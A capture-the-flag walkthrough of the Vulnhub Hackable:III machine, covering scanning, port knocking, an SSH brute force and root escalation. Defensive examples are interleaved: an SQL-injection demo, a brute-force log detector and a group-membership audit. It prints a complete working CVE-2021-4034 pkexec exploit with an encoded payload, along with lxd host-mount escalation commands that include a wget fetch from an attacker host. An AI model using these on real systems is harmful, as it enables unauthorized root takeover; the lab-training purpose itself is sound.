
Vulnhub-Hackable:III

Vulnhub-Hackable:III box walkthrough

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.164
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 17:01 CST
Nmap scan report for 192.168.179.164 (192.168.179.164)
Host is up (0.0030s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Kryptos - LAN Home
|_http-server-header: Apache/2.4.46 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/config
MAC Address: 2A:A3:5A:42:17:24 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 2.98 ms 192.168.179.164 (192.168.179.164)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.08 seconds

Not much extra information here: only 80 and 22 show up, and 22 is filtered, so port knocking is most likely required. Let's look at the web side first.

Web enumeration

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.164
<!DOCTYPE html>
<html lang="pt-br">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<link href="https://fonts.googleapis.com/css?family=RocknRoll+One" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="css/file.css">
<title>Kryptos - LAN Home</title>

</head>
<body>
<a href="#" class="menu-open"><img src="imagens/logo_menu.png" width="2" height="2"></a>
<div class="overlay"></div>
<div class="menu">
<a href="#" class="menu-close">&times;</a>
<ul>
<li><a href="login_page/login.html" target="_blank">Login</a></li>

</ul>

</div>
<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/script.js"></script>
</body>
</html>

A username, jubiscleudo, shows up. The comment also confirms that knocking is needed to open the port, and mentions a .jpg file that still needs approval.
Visiting robots.txt reveals something!

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.164/robots.txt
User-Agente: *
Disallow: /config

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.164/config
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.179.164/config/">here</a>.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.179.164 Port 80</address>
</body></html>


Browsing /config/ in the browser shows a base64-encoded string.

┌──(root㉿kakeru)-[~/tmp]
└─# echo "MTAwMDA=" | base64 -d
10000

That only gives us one port, so let's brute-force directories first.

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.164 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -x html,php,jpg,wbpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.179.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,jpg,wbpg,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 487]
/index.html (Status: 200) [Size: 1095]
/config.php (Status: 200) [Size: 507]
/.htaccess (Status: 403) [Size: 280]
/.htaccess.html (Status: 403) [Size: 280]
/.htaccess.php (Status: 403) [Size: 280]
/.htaccess.jpg (Status: 403) [Size: 280]
/.htaccess.wbpg (Status: 403) [Size: 280]
/robots.txt (Status: 200) [Size: 33]
/. (Status: 200) [Size: 1095]
/home.html (Status: 200) [Size: 11327]
/.html (Status: 403) [Size: 280]
/.html.wbpg (Status: 403) [Size: 280]
/.html.php (Status: 403) [Size: 280]
/.html.jpg (Status: 403) [Size: 280]
/.html.html (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.htpasswd.wbpg (Status: 403) [Size: 280]
/.htpasswd.php (Status: 403) [Size: 280]
/.htpasswd.html (Status: 403) [Size: 280]
/.htpasswd.jpg (Status: 403) [Size: 280]
/.htm (Status: 403) [Size: 280]
/.htm.html (Status: 403) [Size: 280]
/.htm.php (Status: 403) [Size: 280]
/.htm.wbpg (Status: 403) [Size: 280]
/.htm.jpg (Status: 403) [Size: 280]
/.htpasswds (Status: 403) [Size: 280]
/.htpasswds.php (Status: 403) [Size: 280]
/.htpasswds.jpg (Status: 403) [Size: 280]
/.htpasswds.html (Status: 403) [Size: 280]
/.htpasswds.wbpg (Status: 403) [Size: 280]
/.htgroup.jpg (Status: 403) [Size: 280]
/.htgroup (Status: 403) [Size: 280]
/.htgroup.html (Status: 403) [Size: 280]
/.htgroup.wbpg (Status: 403) [Size: 280]
/.htgroup.php (Status: 403) [Size: 280]
/.htaccess.bak (Status: 403) [Size: 280]
/.htaccess.bak.jpg (Status: 403) [Size: 280]
/.htaccess.bak.html (Status: 403) [Size: 280]
/.htaccess.bak.php (Status: 403) [Size: 280]
/.htaccess.bak.wbpg (Status: 403) [Size: 280]
/.htuser (Status: 403) [Size: 280]
/.htuser.jpg (Status: 403) [Size: 280]
/.htuser.html (Status: 403) [Size: 280]
/.htuser.php (Status: 403) [Size: 280]
/.htuser.wbpg (Status: 403) [Size: 280]
/3.jpg (Status: 200) [Size: 61259]
/.ht.jpg (Status: 403) [Size: 280]
/.ht.html (Status: 403) [Size: 280]
/.ht (Status: 403) [Size: 280]
/.ht.php (Status: 403) [Size: 280]
/.ht.wbpg (Status: 403) [Size: 280]
/.htc.html (Status: 403) [Size: 280]
/.htc (Status: 403) [Size: 280]
/.htc.wbpg (Status: 403) [Size: 280]
/.htc.php (Status: 403) [Size: 280]
/.htc.jpg (Status: 403) [Size: 280]
Progress: 81220 / 81225 (99.99%)
===============================================================
Finished
===============================================================

config.php:

<?php
/* Database credentials. Assuming you are running MySQL
   server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_NAME', 'hackable');

/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($conexao === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>

login.php:

<?php
include('config.php');

$usuario = $_POST['user'];
$senha = $_POST['pass'];

// User input is concatenated straight into the SQL text (no parameterization)
$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";

$result = mysqli_query($conexao, $query);

$row = mysqli_num_rows($result);

# account validation
if($row == 1) {
    $_SESSION['usuario'] = $usuario;
    header('Location: 3.jpg');
    exit();
} else {
    $_SESSION['nao_autenticado'] = true;
    header('Location: login_page/login.html');
    exit();
}
?>

Following the code, go to /login_page/login.html, which is a login page. From the code in config.php we know the username is root and the password is empty.
But logging in that way just returns the PHP source again.
Looking at the code, a successful login redirects to 3.jpg anyway, so I'll fetch 3.jpg directly and crack it with stegseek.
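login.php builds its SQL by pasting the POSTed user and pass straight into the query string. As an added example (not code from the box, and written in Python with an in-memory SQLite table rather than the box's PHP/MySQL), the following puts that string-built query next to the parameterized form it should have used. The usuarios table name and user/pass columns come from login.php; the rows are constructed.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the box's 'hackable' database and its 'usuarios' table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE usuarios (user TEXT, pass TEXT)")
    con.execute("INSERT INTO usuarios VALUES ('alice', 'wonderland')")
    con.execute("INSERT INTO usuarios VALUES ('o''brien', 's3cret')")  # legitimate name with an apostrophe
    con.commit()
    return con

def login_unsafe(con, user, pw):
    """Mirror of login.php: user input becomes part of the SQL text itself."""
    query = f"SELECT * FROM usuarios WHERE user = '{user}' and pass = '{pw}'"
    return len(con.execute(query).fetchall()) == 1

def login_safe(con, user, pw):
    """Hardened form: placeholders keep user input out of the SQL grammar entirely."""
    query = "SELECT * FROM usuarios WHERE user = ? AND pass = ?"
    return len(con.execute(query, (user, pw)).fetchall()) == 1

def demo():
    """Run both variants against the same inputs and collect what happens."""
    con = make_db()
    results = {}
    # Benign input: both variants agree.
    results["unsafe_plain"] = login_unsafe(con, "alice", "wonderland")
    results["safe_plain"] = login_safe(con, "alice", "wonderland")
    # A username containing a quote: the string-built query is no longer valid SQL,
    # which is the same mechanism an attacker abuses, seen here as a plain failure.
    try:
        results["unsafe_quote"] = login_unsafe(con, "o'brien", "s3cret")
    except sqlite3.OperationalError as exc:
        results["unsafe_quote"] = f"error: {exc}"
    results["safe_quote"] = login_safe(con, "o'brien", "s3cret")
    results["safe_wrong_pw"] = login_safe(con, "o'brien", "nope")
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The parameterized version is the only change needed in login.php itself (mysqli_prepare / bind_param in PHP); the point the example makes is that the quote in a perfectly valid username already breaks the unsafe query, so the defect is visible without any attack input.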

┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -wl /usr/share/wordlists/rockyou.txt 3.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "steganopayload148505.txt".
[i] Extracting to "3.jpg.out".

That yields porta:65535. I tried knocking with these two ports but it still didn't work.
So our recon is still incomplete; let's try a different scanner.

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.179.164
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.179.164/_25-02-11_17-49-38.txt

Target: http://192.168.179.164/

[17:49:38] Starting:
[17:49:38] 301 - 315B - /js -> http://192.168.179.164/js/
[17:49:39] 403 - 280B - /.ht_wsr.txt
[17:49:39] 403 - 280B - /.htaccess.bak1
[17:49:39] 403 - 280B - /.htaccess.sample
[17:49:39] 403 - 280B - /.htaccess.orig
[17:49:39] 403 - 280B - /.htaccess.save
[17:49:39] 403 - 280B - /.htaccess_orig
[17:49:39] 403 - 280B - /.htaccess_extra
[17:49:39] 403 - 280B - /.htaccessBAK
[17:49:39] 403 - 280B - /.htaccess_sc
[17:49:39] 403 - 280B - /.htaccessOLD2
[17:49:39] 403 - 280B - /.htaccessOLD
[17:49:39] 403 - 280B - /.htm
[17:49:39] 403 - 280B - /.html
[17:49:39] 403 - 280B - /.htpasswds
[17:49:39] 403 - 280B - /.htpasswd_test
[17:49:39] 403 - 280B - /.httr-oauth
[17:49:42] 301 - 319B - /backup -> http://192.168.179.164/backup/
[17:49:42] 200 - 460B - /backup/
[17:49:43] 301 - 319B - /config -> http://192.168.179.164/config/
[17:49:43] 200 - 507B - /config.php
[17:49:43] 200 - 452B - /config/
[17:49:43] 301 - 316B - /css -> http://192.168.179.164/css/
[17:49:45] 200 - 3KB - /home.html
[17:49:45] 200 - 456B - /js/
[17:49:46] 200 - 487B - /login.php
[17:49:49] 200 - 33B - /robots.txt
[17:49:49] 403 - 280B - /server-status
[17:49:49] 403 - 280B - /server-status/

It really did find other directories. The backup directory holds a wordlist file, presumably meant for brute-forcing.
There is also a css directory, again with subdirectories; browsing it shows the files and yields a brainfuck-encoded string.

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.179.164/css/2.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....

Any online decoder turns that into 4444.
Then knock with 4444, 10000 and 65535 in different orders until port 22 opens.

┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.179.164
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 19:04 CST
Nmap scan report for 192.168.179.164 (192.168.179.164)
Host is up (0.00040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 2A:A3:5A:42:17:24 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Next, brute-force SSH with the username and the wordlist we found.

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l jubiscleudo -P pass.txt ssh://192.168.179.164
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 19:07:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 300 login tries (l:1/p:300), ~19 tries per task
[DATA] attacking ssh://192.168.179.164:22/
[22][ssh] host: 192.168.179.164 login: jubiscleudo password: onlymy
[STATUS] 300.00 tries/min, 300 tries in 00:01h, 5 to do in 00:01h, 7 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 19:08:36

Got a shell: jubiscleudo/onlymy.
There is also a way to bypass the knock over IPv6; see group owner ll104567's video at https://space.bilibili.com/20805349?spm_id_from=333.1387.follow.user_card.click
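Seen from the box's side, the hydra run above lands in auth.log as a burst of "Failed password" lines from one address followed by an "Accepted password". The detector below is an added example (not code from the box or this page's author): it parses sshd log lines in the standard syslog format and raises an alert when one source exceeds a failure threshold inside a sliding window, and a second alert if that same source then logs in successfully. The log lines are constructed for the example, with RFC 5737 documentation addresses.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log (not captured from the box).
SAMPLE_AUTH_LOG = """\
Feb 11 19:07:33 ubuntu20 sshd[2101]: Failed password for jubiscleudo from 192.0.2.10 port 50112 ssh2
Feb 11 19:07:33 ubuntu20 sshd[2102]: Failed password for jubiscleudo from 192.0.2.10 port 50113 ssh2
Feb 11 19:07:34 ubuntu20 sshd[2103]: Failed password for jubiscleudo from 192.0.2.10 port 50114 ssh2
Feb 11 19:07:34 ubuntu20 sshd[2104]: Failed password for invalid user admin from 192.0.2.10 port 50115 ssh2
Feb 11 19:07:35 ubuntu20 sshd[2105]: Failed password for jubiscleudo from 192.0.2.10 port 50116 ssh2
Feb 11 19:07:36 ubuntu20 sshd[2106]: Accepted password for jubiscleudo from 192.0.2.10 port 50117 ssh2
Feb 11 19:20:01 ubuntu20 sshd[2200]: Failed password for hackable_3 from 192.0.2.77 port 41000 ssh2
Feb 11 19:25:02 ubuntu20 sshd[2201]: Accepted publickey for hackable_3 from 192.0.2.77 port 41001 ssh2
"""

# sshd's "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n> ssh2" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_auth_log(text, year=2025):
    """Return (timestamp, outcome, user, ip) tuples; syslog lines carry no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines we do not understand are skipped, never guessed at
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["outcome"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Alert on sources with >= threshold failures within window_seconds,
    and again if an already-flagged source later authenticates successfully."""
    recent_failures = defaultdict(list)  # ip -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for ts, outcome, user, ip in sorted(events):
        if outcome == "Failed":
            recent_failures[ip].append(ts)
            recent_failures[ip] = [t for t in recent_failures[ip]
                                   if (ts - t).total_seconds() <= window_seconds]
            if len(recent_failures[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(recent_failures[ip])))
        elif outcome == "Accepted" and ip in flagged:
            # The interesting case: the guessing worked, this is the login to investigate.
            alerts.append(("success_after_bruteforce", ip, user))
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

The threshold and window are the knobs a tool like fail2ban exposes; the "success after brute force" alert is the one worth paging on, since a lockout alone would not have told you that the password was eventually found.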

Privilege escalation

Run linpeas.sh to look for anything exploitable.
It turned up the hackable_3 user's password in /var/www/html/.backup_config.php.

Switch user

hackable_3@ubuntu20:~$ id
uid=1000(hackable_3) gid=1000(hackable_3) groups=1000(hackable_3),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

From a file the group owner shared in the group, I learned that lxd can be used for privilege escalation.
LXD is a root process that carries out actions on behalf of anyone with write access to the LXD UNIX socket, and in some cases LXD does not even check or match the calling user's privileges.

Linux Container (LXC) is usually described as a lightweight virtualization technology, sitting between chroot and a full virtual machine. LXC can create an environment very close to a normal Linux operating system without needing a separate kernel.

Linux Daemon (LXD) is a lightweight container manager built on LXC container technology, which Docker also used in the past. LXD uses the stable LXC API for all of its back-end container management and adds a REST API on top, further improving the user experience.

Search online for "lxd privilege escalation".
First download the tool: https://github.com/saghul/lxd-alpine-builder
Then start an HTTP server so the target can fetch it with wget.

┌──(root㉿kakeru)-[~]
└─# scp kakeru@192.168.179.82:Downloads/lxd-alpine-builder-master.zip .
(kakeru@192.168.179.82) Password:
lxd-alpine-builder-master.zip 100% 3175KB 116.0MB/s 00:00

Following the lxd privilege-escalation steps at https://www.cnblogs.com/jhinjax/p/17078938.html:
after the file has been received, initialize lxd, pressing Enter at every prompt.

┌──(root㉿kakeru)-[~/tmp/lxd-alpine-builder-master]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

hackable_3@ubuntu20:~$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz snap
hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:

Name of the new storage pool [default=default]: Name of the storage backend to use (ceph, btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=5GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, "auto" or "none") [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, "auto" or "none") [default=auto]:
Would you like the LXD server to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:


hackable_3@ubuntu20:~$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias image_name
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
hackable_3@ubuntu20:~$ lxc init image_name ignite -c security.privileged=true
Creating ignite
hackable_3@ubuntu20:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
hackable_3@ubuntu20:~$ lxc start ignite
hackable_3@ubuntu20:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)

How it works
Users in the lxd group can create a container from any image and mount the host's root directory under the container's mnt directory. /mnt/root/ is then a complete root filesystem, and chroot into it gives full root control over the host.
So from here on, look for files under /mnt/root.
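The id output above is the whole finding: hackable_3 sits in gid 116 (lxd), and lxd membership is root-equivalent. An audit of /etc/group for such memberships is the defensive counterpart. The script below is an added example (not from the box or this page's author); the group list it watches is my own choice, and the /etc/group sample is constructed to mirror the box's id output, not copied from it.

```python
# Groups whose members can reach root without an exploit: lxd and docker via
# privileged containers mounting /, disk via raw block-device access, sudo and
# wheel via sudo policy. Membership should be reviewed like a root account.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}

# Constructed /etc/group sample; the lxd line mirrors the id(1) output above.
SAMPLE_ETC_GROUP = """\
root:x:0:
adm:x:4:syslog,hackable_3
sudo:x:27:
disk:x:6:
lxd:x:116:hackable_3
docker:x:998:jubiscleudo
users:x:100:
"""

def parse_etc_group(text):
    """Return {group_name: (gid, [members])} from /etc/group-style text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _password, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups

def root_equivalent_members(groups, watch=ROOT_EQUIVALENT_GROUPS):
    """Map each user to the sorted list of root-equivalent groups that contain them.

    Only supplementary memberships listed in /etc/group are seen here; a user
    whose primary gid (in /etc/passwd) is one of these groups would be missed,
    so a full audit should also check the fourth field of /etc/passwd.
    """
    findings = {}
    for name, (_gid, members) in groups.items():
        if name in watch:
            for user in members:
                findings.setdefault(user, []).append(name)
    return {user: sorted(gs) for user, gs in sorted(findings.items())}

def audit_text(text=SAMPLE_ETC_GROUP):
    return root_equivalent_members(parse_etc_group(text))

def audit_file(path="/etc/group"):
    """Run the same audit against a real group file."""
    with open(path, encoding="utf-8") as f:
        return root_equivalent_members(parse_etc_group(f.read()))

if __name__ == "__main__":
    for user, groups in audit_text().items():
        print(f"{user}: member of root-equivalent group(s) {', '.join(groups)}")
```

On this box the fix is simply removing hackable_3 from lxd (gpasswd -d hackable_3 lxd); the adm membership is left alone because it only grants log reading, which is why adm is not in the watch set.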

Privilege escalation, method 2

The earlier linpeas.sh scan also flagged a vulnerability.

Exploit scripts for pkexec are available, though not the two shown there; the one that applies is CVE-2021-4034.
Here I chose the Python script: no compilation needed, convenient, and it works reliably on the target.

#!/usr/bin/env python3

# CVE-2021-4034 in Python
#
# Joe Ammond (joe@ammond.org)
#
# This was just an experiment to see whether I could get this to work
# in Python, and to play around with ctypes

# This was completely cribbed from blasty's original C code:
# https://haxx.in/files/blasty-vs-pkexec.c

import base64
import os
import sys

from ctypes import *
from ctypes.util import find_library

# Payload, base64 encoded ELF shared object. Generate with:
#
# msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
#
# The PrependSetuid=true is important, without it you'll just get
# a shell as the user and not root.
#
# Should work with any msfvenom payload, tested with linux/x64/exec
# and linux/x64/shell_reverse_tcp

payload_b64 = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''
payload = base64.b64decode(payload_b64)

# Set the environment for the call to execve()
environ = [
    b'exploit',
    b'PATH=GCONV_PATH=.',
    b'LC_MESSAGES=en_US.UTF-8',
    b'XAUTHORITY=../LOL',
    None
]

# Find the C library to call execve() directly, as Python helpfully doesn't
# allow us to call execve() with no arguments.
try:
    libc = CDLL(find_library('c'))
except:
    print('[!] Unable to find the C library, wtf?')
    sys.exit()

# Create the shared library from the payload
print('[+] Creating shared library for exploit code.')
try:
    with open('payload.so', 'wb') as f:
        f.write(payload)
except:
    print('[!] Failed creating payload.so.')
    sys.exit()
os.chmod('payload.so', 0o0755)

# make the GCONV_PATH directory
try:
    os.mkdir('GCONV_PATH=.')
except FileExistsError:
    print('[-] GCONV_PATH=. directory already exists, continuing.')
except:
    print('[!] Failed making GCONV_PATH=. directory.')
    sys.exit()

# Create a temp exploit file
try:
    with open('GCONV_PATH=./exploit', 'wb') as f:
        f.write(b'')
except:
    print('[!] Failed creating exploit file')
    sys.exit()
os.chmod('GCONV_PATH=./exploit', 0o0755)

# Create directory to hold gconf-modules configuration file
try:
    os.mkdir('exploit')
except FileExistsError:
    print('[-] exploit directory already exists, continuing.')
except:
    print('[!] Failed making exploit directory.')
    sys.exit()

# Create gconf config file
try:
    with open('exploit/gconv-modules', 'wb') as f:
        f.write(b'module UTF-8// INTERNAL ../payload 2\n')
except:
    print('[!] Failed to create gconf-modules config file.')
    sys.exit()

# Convert the environment to an array of char*
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ

print('[+] Calling execve()')
# Call execve() with NULL arguments
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)

jubiscleudo@ubuntu20:~$ vi a.py
jubiscleudo@ubuntu20:~$ chmod +x a.py
jubiscleudo@ubuntu20:~$ ./a.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1001(jubiscleudo) groups=1001(jubiscleudo)
# pwd
/home/jubiscleudo

Privilege escalation, step by step

# (1) Fetch the Alpine Linux image
wget http://<attacker IP>/alpine-v3.13-x86_64-20210218_0139.tar.gz

# Initialize lxd
lxd init    # press Enter at every prompt

# Then import the image:
lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias image_name

# Create a privileged container
lxc init image_name ignite -c security.privileged=true

# Mount the host's root filesystem
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

# Start and enter the container
lxc start ignite
lxc exec ignite /bin/sh

# Switch into the host's filesystem
chroot /mnt/root

Summary: I learned what lxd is and how to use it for privilege escalation (after the lxd escalation the host's filesystem is under /mnt/root), and how to use a kernel-level exploit.
Since my machine is arm, I ran into trouble compiling the x86 binary earlier and learned the cross-compiler x86_64-linux-gnu-gcc,
and that C compiled locally needs -static so the resulting binary does not depend on dynamic libraries; with a script, having Python available means no C is needed at all.